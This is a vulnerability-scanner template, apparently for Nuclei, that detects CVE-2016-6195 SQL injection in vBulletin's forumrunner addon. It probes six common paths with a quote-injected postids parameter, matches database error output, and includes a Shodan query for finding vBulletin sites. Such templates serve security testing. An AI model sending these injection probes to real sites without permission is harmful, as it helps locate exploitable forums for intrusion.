54 lines
1.8 KiB
YAML
54 lines
1.8 KiB
YAML
id: CVE-2016-6195
|
|
|
|
info:
|
|
name: vBulletin <= 4.2.3 - SQL Injection
|
|
author: MaStErChO
|
|
severity: critical
|
|
description: |
|
|
vBulletin versions 3.6.0 through 4.2.3 are vulnerable to an SQL injection vulnerability in the vBulletin core forumrunner addon. The vulnerability allows an attacker to execute arbitrary SQL queries and potentially access sensitive information from the database.
|
|
reference:
|
|
- https://www.cvedetails.com/cve/CVE-2016-6195/
|
|
- https://www.exploit-db.com/exploits/38489
|
|
- https://enumerated.wordpress.com/2016/07/11/1/
|
|
- http://www.vbulletin.org/forum/showthread.php?t=322848
|
|
- https://github.com/drewlong/vbully
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2016-6195
|
|
cwe-id: CWE-89
|
|
epss-score: 0.00284
|
|
cpe: cpe:2.3:a:vbulletin:vbulletin:*:patch_level_4:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 6
|
|
shodan-query: title:"Powered By vBulletin"
|
|
verified: "true"
|
|
vendor: vbulletin
|
|
product: vbulletin
|
|
tags: cve,cve2016,vbulletin,sqli,forum,edb
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
|
|
- "{{BaseURL}}/boards/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
|
|
- "{{BaseURL}}/board/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
|
|
- "{{BaseURL}}/forum/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
|
|
- "{{BaseURL}}/forums/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
|
|
- "{{BaseURL}}/vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"
|
|
|
|
stop-at-first-match: true
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "type=dberror"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- 503
|
|
condition: or
|